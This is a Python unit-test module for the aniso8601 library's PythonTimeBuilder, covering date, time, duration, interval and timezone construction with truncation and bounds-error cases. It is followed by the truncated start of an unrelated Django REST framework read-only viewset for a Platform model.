datetime.time(hour=12, minute=30)),
({'hh': '23.99999999997'},
datetime.time(hour=23, minute=59, second=59,
microsecond=999999)),
({'hh': '1', 'mm': '23'},
datetime.time(hour=1, minute=23)),
({'hh': '1', 'mm': '23.4567'},
datetime.time(hour=1, minute=23, second=27,
microsecond=402000)),
({'hh': '14', 'mm': '43.999999997'},
datetime.time(hour=14, minute=43, second=59,
microsecond=999999)),
({'hh': '1', 'mm': '23', 'ss': '45'},
datetime.time(hour=1, minute=23, second=45)),
({'hh': '23', 'mm': '21', 'ss': '28.512400'},
datetime.time(hour=23, minute=21, second=28,
microsecond=512400)),
({'hh': '01', 'mm': '03', 'ss': '11.858714'},
datetime.time(hour=1, minute=3, second=11,
microsecond=858714)),
({'hh': '14', 'mm': '43', 'ss': '59.9999997'},
datetime.time(hour=14, minute=43, second=59,
microsecond=999999)),
({'hh': '24'}, datetime.time(hour=0)),
({'hh': '24', 'mm': '00'}, datetime.time(hour=0)),
({'hh': '24', 'mm': '00', 'ss': '00'},
datetime.time(hour=0)),
({'tz': (False, None, '00', '00', 'UTC', 'timezone')},
datetime.time(tzinfo=UTCOffset(name='UTC', minutes=0))),
({'hh': '23', 'mm': '21', 'ss': '28.512400',
'tz': (False, None, '00', '00', '+00:00', 'timezone')},
datetime.time(hour=23, minute=21, second=28,
microsecond=512400,
tzinfo=UTCOffset(name='+00:00',
minutes=0))),
({'hh': '1', 'mm': '23',
'tz': (False, None, '01', '00', '+1', 'timezone')},
datetime.time(hour=1, minute=23,
tzinfo=UTCOffset(name='+1',
minutes=60))),
({'hh': '1', 'mm': '23.4567',
'tz': (True, None, '01', '00', '-1', 'timezone')},
datetime.time(hour=1, minute=23, second=27,
microsecond=402000,
tzinfo=UTCOffset(name='-1',
minutes=-60))),
({'hh': '23', 'mm': '21', 'ss': '28.512400',
'tz': (False, None, '01', '30', '+1:30', 'timezone')},
datetime.time(hour=23, minute=21, second=28,
microsecond=512400,
tzinfo=UTCOffset(name='+1:30',
minutes=90))),
({'hh': '23', 'mm': '21', 'ss': '28.512400',
'tz': (False, None, '11', '15', '+11:15', 'timezone')},
datetime.time(hour=23, minute=21, second=28,
microsecond=512400,
tzinfo=UTCOffset(name='+11:15',
minutes=675))),
({'hh': '23', 'mm': '21', 'ss': '28.512400',
'tz': (False, None, '12', '34', '+12:34', 'timezone')},
datetime.time(hour=23, minute=21, second=28,
microsecond=512400,
tzinfo=UTCOffset(name='+12:34',
minutes=754))),
({'hh': '23', 'mm': '21', 'ss': '28.512400',
'tz': (False, None, '00', '00', 'UTC', 'timezone')},
datetime.time(hour=23, minute=21, second=28,
microsecond=512400,
tzinfo=UTCOffset(name='UTC',
minutes=0))),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
#https://bitbucket.org/nielsenb/aniso8601/issues/21/sub-microsecond-precision-is-lost-when
({'hh': '14.9999999999999999'},
datetime.time(hour=14, minute=59, second=59,
microsecond=999999)),
({'mm': '0.00000000999'},
datetime.time()),
({'mm': '0.0000000999'},
datetime.time(microsecond=5)),
({'ss': '0.0000001'},
datetime.time()),
({'ss': '2.0000048'},
datetime.time(second=2,
microsecond=4)))
for testtuple in testtuples:
result = PythonTimeBuilder.build_time(**testtuple[0])
self.assertEqual(result, testtuple[1])
def test_build_time_bounds_checking(self):
#Leap seconds not supported
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
#https://bitbucket.org/nielsenb/aniso8601/issues/13/parsing-of-leap-second-gives-wildly
with self.assertRaises(LeapSecondError):
PythonTimeBuilder.build_time(hh='23', mm='59', ss='60')
with self.assertRaises(LeapSecondError):
PythonTimeBuilder.build_time(hh='23', mm='59', ss='60',
tz=UTCOffset(name='UTC', minutes=0))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='00', ss='60')
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='00', ss='60',
tz=UTCOffset(name='UTC', minutes=0))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='00', ss='61')
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='00', ss='61',
tz=UTCOffset(name='UTC', minutes=0))
with self.assertRaises(MinutesOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='61')
with self.assertRaises(MinutesOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='61',
tz=UTCOffset(name='UTC', minutes=0))
with self.assertRaises(MinutesOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='60')
with self.assertRaises(MinutesOutOfBoundsError):
PythonTimeBuilder.build_time(hh='00', mm='60.1')
with self.assertRaises(HoursOutOfBoundsError):
PythonTimeBuilder.build_time(hh='25')
#Hour 24 can only represent midnight
with self.assertRaises(MidnightBoundsError):
PythonTimeBuilder.build_time(hh='24', mm='00', ss='01')
with self.assertRaises(MidnightBoundsError):
PythonTimeBuilder.build_time(hh='24', mm='00.1')
with self.assertRaises(MidnightBoundsError):
PythonTimeBuilder.build_time(hh='24', mm='01')
with self.assertRaises(MidnightBoundsError):
PythonTimeBuilder.build_time(hh='24.1')
def test_build_datetime(self):
testtuples = (((('2019', '06', '05', None, None, None, 'date'),
('01', '03', '11.858714', None, 'time')),
datetime.datetime(2019, 6, 5, hour=1, minute=3,
second=11, microsecond=858714)),
((('1234', '02', '03', None, None, None, 'date'),
('23', '21', '28.512400', None, 'time')),
datetime.datetime(1234, 2, 3, hour=23, minute=21,
second=28, microsecond=512400)),
((('1981', '04', '05', None, None, None, 'date'),
('23', '21', '28.512400',
(False, None, '11', '15', '+11:15', 'timezone'),
'time')),
datetime.datetime(1981, 4, 5, hour=23, minute=21,
second=28, microsecond=512400,
tzinfo=UTCOffset(name='+11:15',
minutes=675))))
for testtuple in testtuples:
result = PythonTimeBuilder.build_datetime(*testtuple[0])
self.assertEqual(result, testtuple[1])
def test_build_datetime_bounds_checking(self):
#Leap seconds not supported
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
#https://bitbucket.org/nielsenb/aniso8601/issues/13/parsing-of-leap-second-gives-wildly
with self.assertRaises(LeapSecondError):
PythonTimeBuilder.build_datetime(('2016', '12', '31',
None, None, None, 'date'),
('23', '59', '60', None, 'time'))
with self.assertRaises(LeapSecondError):
PythonTimeBuilder.build_datetime(('2016', '12', '31',
None, None, None, 'date'),
('23', '59', '60',
(False, None, '00', '00',
'+00:00', 'timezone'), 'time'))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
None, None, None, 'date'),
('00', '00', '60', None, 'time'))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
None, None, None, 'date'),
('00', '00', '60',
(False, None, '00', '00',
'+00:00', 'timezone'), 'time'))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
None, None, None, 'date'),
('00', '00', '61', None, 'time'))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
None, None, None, 'date'),
('00', '00', '61',
(False, None, '00', '00',
'+00:00', 'timezone'), 'time'))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
None, None, None, 'date'),
('00', '59', '61', None, 'time'))
with self.assertRaises(SecondsOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
None, None, None, 'date'),
('00', '59', '61',
(False, None, '00', '00',
'+00:00', 'timezone'), 'time'))
with self.assertRaises(MinutesOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
None, None, None, 'date'),
('00', '61', None, None, 'time'))
with self.assertRaises(MinutesOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
None, None, None, 'date'),
('00', '61', None,
(False, None, '00', '00',
'+00:00', 'timezone'), 'time'))
def test_build_duration(self):
testtuples = (({'PnY': '1', 'PnM': '2', 'PnD': '3',
'TnH': '4', 'TnM': '54', 'TnS': '6'},
datetime.timedelta(days=428, hours=4,
minutes=54, seconds=6)),
({'PnY': '1', 'PnM': '2', 'PnD': '3',
'TnH': '4', 'TnM': '54', 'TnS': '6.5'},
datetime.timedelta(days=428, hours=4,
minutes=54, seconds=6.5)),
({'PnY': '1', 'PnM': '2', 'PnD': '3'},
datetime.timedelta(days=428)),
({'PnY': '1', 'PnM': '2', 'PnD': '3.5'},
datetime.timedelta(days=428.5)),
({'TnH': '4', 'TnM': '54', 'TnS': '6.5'},
datetime.timedelta(hours=4, minutes=54, seconds=6.5)),
({'TnH': '1', 'TnM': '3', 'TnS': '11.858714'},
datetime.timedelta(hours=1, minutes=3,
seconds=11, microseconds=858714)),
({'TnH': '4', 'TnM': '54', 'TnS': '28.512400'},
datetime.timedelta(hours=4, minutes=54,
seconds=28, microseconds=512400)),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
#https://bitbucket.org/nielsenb/aniso8601/issues/21/sub-microsecond-precision-is-lost-when
({'PnY': '1999.9999999999999999'},
datetime.timedelta(days=729999, seconds=86399,
microseconds=999999)),
({'PnM': '1.9999999999999999'},
datetime.timedelta(days=59, hours=23,
minutes=59, seconds=59,
microseconds=999999)),
({'PnW': '1.9999999999999999'},
datetime.timedelta(days=13, hours=23,
minutes=59, seconds=59,
microseconds=999999)),
({'PnD': '1.9999999999999999'},
datetime.timedelta(days=1, hours=23,
minutes=59, seconds=59,
microseconds=999999)),
({'TnH': '14.9999999999999999'},
datetime.timedelta(hours=14, minutes=59,
seconds=59, microseconds=999999)),
({'TnM': '0.00000000999'}, datetime.timedelta(0)),
({'TnM': '0.0000000999'},
datetime.timedelta(microseconds=5)),
({'TnS': '0.0000001'}, datetime.timedelta(0)),
({'TnS': '2.0000048'},
datetime.timedelta(seconds=2, microseconds=4)),
({'PnY': '1'}, datetime.timedelta(days=365)),
({'PnY': '1.5'}, datetime.timedelta(days=547.5)),
({'PnM': '1'}, datetime.timedelta(days=30)),
({'PnM': '1.5'}, datetime.timedelta(days=45)),
({'PnW': '1'}, datetime.timedelta(days=7)),
({'PnW': '1.5'}, datetime.timedelta(days=10.5)),
({'PnD': '1'}, datetime.timedelta(days=1)),
({'PnD': '1.5'}, datetime.timedelta(days=1.5)),
({'PnY': '0003', 'PnM': '06', 'PnD': '04',
'TnH': '12', 'TnM': '30', 'TnS': '05'},
datetime.timedelta(days=1279, hours=12,
minutes=30, seconds=5)),
({'PnY': '0003', 'PnM': '06', 'PnD': '04',
'TnH': '12', 'TnM': '30', 'TnS': '05.5'},
datetime.timedelta(days=1279, hours=12,
minutes=30, seconds=5.5)),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
({'PnY': '0001', 'PnM': '02', 'PnD': '03',
'TnH': '14', 'TnM': '43', 'TnS': '59.9999997'},
datetime.timedelta(days=428, hours=14,
minutes=43, seconds=59,
microseconds=999999)),
#Verify overflows
({'TnH': '36'}, datetime.timedelta(days=1, hours=12)))
for testtuple in testtuples:
result = PythonTimeBuilder.build_duration(**testtuple[0])
self.assertEqual(result, testtuple[1])
def test_build_interval(self):
testtuples = (({'end': (('1981', '04', '05', None, None, None, 'date'),
('01', '01', '00', None, 'time'), 'datetime'),
'duration': (None, '1', None, None, None, None, None,
'duration')},
datetime.datetime(year=1981, month=4, day=5,
hour=1, minute=1),
datetime.datetime(year=1981, month=3, day=6,
hour=1, minute=1)),
({'end': ('1981', '04', '05', None, None, None, 'date'),
'duration': (None, '1', None, None, None, None, None,
'duration')},
datetime.date(year=1981, month=4, day=5),
datetime.date(year=1981, month=3, day=6)),
({'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': ('1.5', None, None, None, None, None, None,
'duration')},
datetime.date(year=2018, month=3, day=6),
datetime.datetime(year=2016, month=9, day=4,
hour=12)),
({'end': ('2014', '11', '12', None, None, None, 'date'),
'duration': (None, None, None, None, '1', None, None,
'duration')},
datetime.date(year=2014, month=11, day=12),
datetime.datetime(year=2014, month=11, day=11,
hour=23)),
({'end': ('2014', '11', '12', None, None, None, 'date'),
'duration': (None, None, None, None, '4', '54', '6.5',
'duration')},
datetime.date(year=2014, month=11, day=12),
datetime.datetime(year=2014, month=11, day=11,
hour=19, minute=5, second=53,
microsecond=500000)),
({'end': (('2050', '03', '01',
None, None, None, 'date'),
('13', '00', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime'),
'duration': (None, None, None,
None, '10', None, None, 'duration')},
datetime.datetime(year=2050, month=3, day=1,
hour=13,
tzinfo=UTCOffset(name='UTC',
minutes=0)),
datetime.datetime(year=2050, month=3, day=1,
hour=3,
tzinfo=UTCOffset(name='UTC',
minutes=0))),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
#https://bitbucket.org/nielsenb/aniso8601/issues/21/sub-microsecond-precision-is-lost-when
({'end': ('2000', '01', '01',
None, None, None, 'date'),
'duration': ('1999.9999999999999999', None, None,
None, None, None,
None, 'duration')},
datetime.date(year=2000, month=1, day=1),
datetime.datetime(year=1, month=4, day=30,
hour=0, minute=0, second=0,
microsecond=1)),
({'end': ('1989', '03', '01',
None, None, None, 'date'),
'duration': (None, '1.9999999999999999', None,
None, None, None,
None, 'duration')},
datetime.date(year=1989, month=3, day=1),
datetime.datetime(year=1988, month=12, day=31,
hour=0, minute=0, second=0,
microsecond=1)),
({'end': ('1989', '03', '01',
None, None, None, 'date'),
'duration': (None, None, '1.9999999999999999',
None, None, None,
None, 'duration')},
datetime.date(year=1989, month=3, day=1),
datetime.datetime(year=1989, month=2, day=15,
hour=0, minute=0, second=0,
microsecond=1)),
({'end': ('1989', '03', '01',
None, None, None, 'date'),
'duration': (None, None, None,
'1.9999999999999999', None, None,
None, 'duration')},
datetime.date(year=1989, month=3, day=1),
datetime.datetime(year=1989, month=2, day=27,
hour=0, minute=0, second=0,
microsecond=1)),
({'end': ('2001', '01', '01',
None, None, None, 'date'),
'duration': (None, None, None,
None, '14.9999999999999999', None,
None, 'duration')},
datetime.date(year=2001, month=1, day=1),
datetime.datetime(year=2000, month=12, day=31,
hour=9, minute=0, second=0,
microsecond=1)),
({'end': ('2001', '01', '01',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, '0.00000000999',
None, 'duration')},
datetime.date(year=2001, month=1, day=1),
datetime.datetime(year=2001, month=1, day=1)),
({'end': ('2001', '01', '01',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, '0.0000000999',
None, 'duration')},
datetime.date(year=2001, month=1, day=1),
datetime.datetime(year=2000, month=12, day=31,
hour=23, minute=59, second=59,
microsecond=999995)),
({'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'0.0000001', 'duration')},
datetime.date(year=2018, month=3, day=6),
datetime.datetime(year=2018, month=3, day=6)),
({'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'2.0000048', 'duration')},
datetime.date(year=2018, month=3, day=6),
datetime.datetime(year=2018, month=3, day=5,
hour=23, minute=59, second=57,
microsecond=999996)),
({'start': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'duration': (None, '1', None,
'1', None, '1', None, 'duration')},
datetime.datetime(year=1981, month=4, day=5,
hour=1, minute=1),
datetime.datetime(year=1981, month=5, day=6,
hour=1, minute=2)),
({'start': ('1981', '04', '05',
None, None, None, 'date'),
'duration': (None, '1', None,
'1', None, None, None, 'duration')},
datetime.date(year=1981, month=4, day=5),
datetime.date(year=1981, month=5, day=6)),
({'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, '2.5', None,
None, None, None, None, 'duration')},
datetime.date(year=2018, month=3, day=6),
datetime.date(year=2018, month=5, day=20)),
({'start': ('2014', '11', '12',
None, None, None, 'date'),
'duration': (None, None, None,
None, '1', None, None, 'duration')},
datetime.date(year=2014, month=11, day=12),
datetime.datetime(year=2014, month=11, day=12,
hour=1, minute=0)),
({'start': ('2014', '11', '12',
None, None, None, 'date'),
'duration': (None, None, None,
None, '4', '54', '6.5', 'duration')},
datetime.date(year=2014, month=11, day=12),
datetime.datetime(year=2014, month=11, day=12,
hour=4, minute=54, second=6,
microsecond=500000)),
({'start': (('2050', '03', '01',
None, None, None, 'date'),
('13', '00', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime'),
'duration': (None, None, None,
None, '10', None, None, 'duration')},
datetime.datetime(year=2050, month=3, day=1,
hour=13,
tzinfo=UTCOffset(name='UTC',
minutes=0)),
datetime.datetime(year=2050, month=3, day=1,
hour=23,
tzinfo=UTCOffset(name='UTC',
minutes=0))),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
({'start': ('0001', '01', '01',
None, None, None, 'date'),
'duration': ('1999.9999999999999999', None, None,
None, None, None,
None, 'duration')},
datetime.date(year=1, month=1, day=1),
datetime.datetime(year=1999, month=9, day=3,
hour=23, minute=59, second=59,
microsecond=999999)),
({'start': ('1989', '03', '01',
None, None, None, 'date'),
'duration': (None, '1.9999999999999999', None,
None, None, None,
None, 'duration')},
datetime.date(year=1989, month=3, day=1),
datetime.datetime(year=1989, month=4, day=29,
hour=23, minute=59, second=59,
microsecond=999999)),
({'start': ('1989', '03', '01',
None, None, None, 'date'),
'duration': (None, None, '1.9999999999999999',
None, None, None,
None, 'duration')},
datetime.date(year=1989, month=3, day=1),
datetime.datetime(year=1989, month=3, day=14,
hour=23, minute=59, second=59,
microsecond=999999)),
({'start': ('1989', '03', '01',
None, None, None, 'date'),
'duration': (None, None, None,
'1.9999999999999999', None, None,
None, 'duration')},
datetime.date(year=1989, month=3, day=1),
datetime.datetime(year=1989, month=3, day=2,
hour=23, minute=59, second=59,
microsecond=999999)),
({'start': ('2001', '01', '01',
None, None, None, 'date'),
'duration': (None, None, None,
None, '14.9999999999999999', None,
None, 'duration')},
datetime.date(year=2001, month=1, day=1),
datetime.datetime(year=2001, month=1, day=1,
hour=14, minute=59, second=59,
microsecond=999999)),
({'start': ('2001', '01', '01',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, '0.00000000999',
None, 'duration')},
datetime.date(year=2001, month=1, day=1),
datetime.datetime(year=2001, month=1, day=1)),
({'start': ('2001', '01', '01',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, '0.0000000999',
None, 'duration')},
datetime.date(year=2001, month=1, day=1),
datetime.datetime(year=2001, month=1, day=1,
hour=0, minute=0, second=0,
microsecond=5)),
({'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'0.0000001', 'duration')},
datetime.date(year=2018, month=3, day=6),
datetime.datetime(year=2018, month=3, day=6)),
({'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'2.0000048', 'duration')},
datetime.date(year=2018, month=3, day=6),
datetime.datetime(year=2018, month=3, day=6,
hour=0, minute=0, second=2,
microsecond=4)),
({'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime')},
datetime.datetime(year=1980, month=3, day=5,
hour=1, minute=1),
datetime.datetime(year=1981, month=4, day=5,
hour=1, minute=1)),
({'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
'end': ('1981', '04', '05',
None, None, None, 'date')},
datetime.datetime(year=1980, month=3, day=5,
hour=1, minute=1),
datetime.date(year=1981, month=4, day=5)),
({'start': ('1980', '03', '05',
None, None, None, 'date'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime')},
datetime.date(year=1980, month=3, day=5),
datetime.datetime(year=1981, month=4, day=5,
hour=1, minute=1)),
({'start': ('1980', '03', '05',
None, None, None, 'date'),
'end': ('1981', '04', '05',
None, None, None, 'date')},
datetime.date(year=1980, month=3, day=5),
datetime.date(year=1981, month=4, day=5)),
({'start': ('1981', '04', '05',
None, None, None, 'date'),
'end': ('1980', '03', '05',
None, None, None, 'date')},
datetime.date(year=1981, month=4, day=5),
datetime.date(year=1980, month=3, day=5)),
({'start': (('2050', '03', '01',
None, None, None, 'date'),
('13', '00', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime'),
'end': (('2050', '05', '11',
None, None, None, 'date'),
('15', '30', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime')},
datetime.datetime(year=2050, month=3, day=1,
hour=13,
tzinfo=UTCOffset(name='UTC',
minutes=0)),
datetime.datetime(year=2050, month=5, day=11,
hour=15, minute=30,
tzinfo=UTCOffset(name='UTC',
minutes=0))),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
({'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00.0000001',
None, 'time'), 'datetime'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('14', '43', '59.9999997', None, 'time'),
'datetime')},
datetime.datetime(year=1980, month=3, day=5,
hour=1, minute=1),
datetime.datetime(year=1981, month=4, day=5,
hour=14, minute=43, second=59,
microsecond=999999)))
for testtuple in testtuples:
result = PythonTimeBuilder.build_interval(**testtuple[0])
self.assertEqual(result[0], testtuple[1])
self.assertEqual(result[1], testtuple[2])
def test_build_repeating_interval(self):
args = {'Rnn': '3', 'interval': (('1981', '04', '05',
None, None, None, 'date'),
None,
(None, None, None,
'1', None, None,
None, 'duration'),
'interval')}
results = list(PythonTimeBuilder.build_repeating_interval(**args))
self.assertEqual(results[0], datetime.date(year=1981, month=4, day=5))
self.assertEqual(results[1], datetime.date(year=1981, month=4, day=6))
self.assertEqual(results[2], datetime.date(year=1981, month=4, day=7))
args = {'Rnn': '11', 'interval': (None,
(('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
(None, None, None,
None, '1', '2',
None, 'duration'),
'interval')}
results = list(PythonTimeBuilder.build_repeating_interval(**args))
for dateindex in compat.range(0, 11):
self.assertEqual(results[dateindex],
datetime.datetime(year=1980, month=3, day=5,
hour=1, minute=1)
- dateindex * datetime.timedelta(hours=1,
minutes=2))
args = {'Rnn': '2', 'interval': ((('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
(('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
None,
'interval')}
results = list(PythonTimeBuilder.build_repeating_interval(**args))
self.assertEqual(results[0],
datetime.datetime(year=1980, month=3, day=5,
hour=1, minute=1))
self.assertEqual(results[1],
datetime.datetime(year=1981, month=4, day=5,
hour=1, minute=1))
args = {'Rnn': '2', 'interval': ((('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
(('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
None,
'interval')}
results = list(PythonTimeBuilder.build_repeating_interval(**args))
self.assertEqual(results[0],
datetime.datetime(year=1980, month=3, day=5,
hour=1, minute=1))
self.assertEqual(results[1],
datetime.datetime(year=1981, month=4, day=5,
hour=1, minute=1))
args = {'R': True, 'interval': (None,
(('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
(None, None, None,
None, '1', '2', None, 'duration'),
'interval')}
resultgenerator = PythonTimeBuilder.build_repeating_interval(**args)
#Test the first 11 generated
for dateindex in compat.range(0, 11):
self.assertEqual(next(resultgenerator),
datetime.datetime(year=1980, month=3, day=5,
hour=1, minute=1)
- dateindex * datetime.timedelta(hours=1,
minutes=2))
def test_build_timezone(self):
testtuples = (({'Z': True, 'name': 'Z'},
datetime.timedelta(hours=0), 'UTC'),
({'negative': False, 'hh': '00', 'mm': '00',
'name': '+00:00'},
datetime.timedelta(hours=0), '+00:00'),
({'negative': False, 'hh': '01', 'mm': '00',
'name': '+01:00'},
datetime.timedelta(hours=1), '+01:00'),
({'negative': True, 'hh': '01', 'mm': '00',
'name': '-01:00'},
-datetime.timedelta(hours=1), '-01:00'),
({'negative': False, 'hh': '00', 'mm': '12',
'name': '+00:12'},
datetime.timedelta(minutes=12), '+00:12'),
({'negative': False, 'hh': '01', 'mm': '23',
'name': '+01:23'},
datetime.timedelta(hours=1, minutes=23), '+01:23'),
({'negative': True, 'hh': '01', 'mm': '23',
'name': '-01:23'},
-datetime.timedelta(hours=1, minutes=23), '-01:23'),
({'negative': False, 'hh': '00',
'name': '+00'},
datetime.timedelta(hours=0), '+00'),
({'negative': False, 'hh': '01',
'name': '+01'},
datetime.timedelta(hours=1), '+01'),
({'negative': True, 'hh': '01',
'name': '-01'},
-datetime.timedelta(hours=1), '-01'),
({'negative': False, 'hh': '12',
'name': '+12'},
datetime.timedelta(hours=12), '+12'),
({'negative': True, 'hh': '12',
'name': '-12'},
-datetime.timedelta(hours=12), '-12'))
for testtuple in testtuples:
result = PythonTimeBuilder.build_timezone(**testtuple[0])
self.assertEqual(result.utcoffset(None), testtuple[1])
self.assertEqual(result.tzname(None), testtuple[2])
def test_build_week_date(self):
weekdate = PythonTimeBuilder._build_week_date(2009, 1)
self.assertEqual(weekdate, datetime.date(year=2008, month=12, day=29))
weekdate = PythonTimeBuilder._build_week_date(2009, 53, isoday=7)
self.assertEqual(weekdate, datetime.date(year=2010, month=1, day=3))
def test_build_ordinal_date(self):
ordinaldate = PythonTimeBuilder._build_ordinal_date(1981, 95)
self.assertEqual(ordinaldate, datetime.date(year=1981, month=4, day=5))
def test_build_ordinal_date_bounds_checking(self):
with self.assertRaises(DayOutOfBoundsError):
PythonTimeBuilder._build_ordinal_date(1234, 0)
with self.assertRaises(DayOutOfBoundsError):
PythonTimeBuilder._build_ordinal_date(1234, 367)
def test_iso_year_start(self):
yearstart = PythonTimeBuilder._iso_year_start(2004)
self.assertEqual(yearstart, datetime.date(year=2003, month=12, day=29))
yearstart = PythonTimeBuilder._iso_year_start(2010)
self.assertEqual(yearstart, datetime.date(year=2010, month=1, day=4))
yearstart = PythonTimeBuilder._iso_year_start(2009)
self.assertEqual(yearstart, datetime.date(year=2008, month=12, day=29))
def test_date_generator(self):
startdate = datetime.date(year=2018, month=8, day=29)
timedelta = datetime.timedelta(days=1)
iterations = 10
generator = PythonTimeBuilder._date_generator(startdate,
timedelta,
iterations)
results = list(generator)
for dateindex in compat.range(0, 10):
self.assertEqual(results[dateindex],
datetime.date(year=2018, month=8, day=29)
+ dateindex * datetime.timedelta(days=1))
def test_date_generator_unbounded(self):
startdate = datetime.date(year=2018, month=8, day=29)
timedelta = datetime.timedelta(days=5)
generator = PythonTimeBuilder._date_generator_unbounded(startdate,
timedelta)
#Check the first 10 results
for dateindex in compat.range(0, 10):
self.assertEqual(next(generator),
datetime.date(year=2018, month=8, day=29)
+ dateindex * datetime.timedelta(days=5))
def test_split_to_microseconds(self):
result = PythonTimeBuilder._split_to_microseconds('1.1', int(1e6), 'dummy')
self.assertEqual(result, (1, 100000))
self.assertIsInstance(result[0], int)
self.assertIsInstance(result[1], int)
result = PythonTimeBuilder._split_to_microseconds('1.000001', int(1e6), 'dummy')
self.assertEqual(result, (1, 1))
self.assertIsInstance(result[0], int)
self.assertIsInstance(result[1], int)
result = PythonTimeBuilder._split_to_microseconds('1.0000001', int(1e6), 'dummy')
self.assertEqual(result, (1, 0))
self.assertIsInstance(result[0], int)
self.assertIsInstance(result[1], int)
def test_split_to_microseconds_exception(self):
with self.assertRaises(ISOFormatError) as e:
PythonTimeBuilder._split_to_microseconds('b.1', int(1e6), 'exception text')
self.assertEqual(str(e.exception), 'exception text')
with self.assertRaises(ISOFormatError) as e:
PythonTimeBuilder._split_to_microseconds('1.ad', int(1e6), 'exception text')
self.assertEqual(str(e.exception), 'exception text')
def test_distribute_microseconds(self):
self.assertEqual(PythonTimeBuilder._distribute_microseconds(1, (), ()), (1,))
self.assertEqual(PythonTimeBuilder._distribute_microseconds(11, (0,), (10,)), (1, 1))
self.assertEqual(PythonTimeBuilder._distribute_microseconds(211, (0, 0), (100, 10)), (2, 1, 1))
self.assertEqual(PythonTimeBuilder._distribute_microseconds(1, (), ()), (1,))
self.assertEqual(PythonTimeBuilder._distribute_microseconds(11, (5,), (10,)), (6, 1))
self.assertEqual(PythonTimeBuilder._distribute_microseconds(211, (10, 5), (100, 10)), (12, 6, 1))
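# Context note (illustrative addition, not part of the original test module): the
# builder exercised above is what aniso8601's top-level parse helpers use by
# default, so the same expectations can be observed through the public API.
if __name__ == '__main__':
    import aniso8601
    # Ordinal date YYYY-DDD, matching the DDD='095' case in test_build_date.
    assert aniso8601.parse_date('1981-095') == datetime.date(1981, 4, 5)
    # Sub-microsecond precision is truncated, matching the TnS='2.0000048' case above.
    assert aniso8601.parse_duration('PT2.0000048S') == datetime.timedelta(seconds=2, microseconds=4)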
|
from rest_framework import viewsets
from rest_framework.permissions import IsAuthenticated
from unifier.apps.core.models import Platform
from unifier.apps.drf.v1.pagination import BasePagination
from unifier.apps.drf.v1.serializers import PlatformSerializer, PlatformSerializerDetail
class PlatformViewSet(viewsets.ReadOnlyModelViewSet):
queryset = Platform.objects.all().order_by("name")
serializer_class = PlatformSerializer
pagination_class = BasePagination
permission_classes = (IsAuthenticated,)
def get_serializer_class(self):
if self.action == "retrieve":
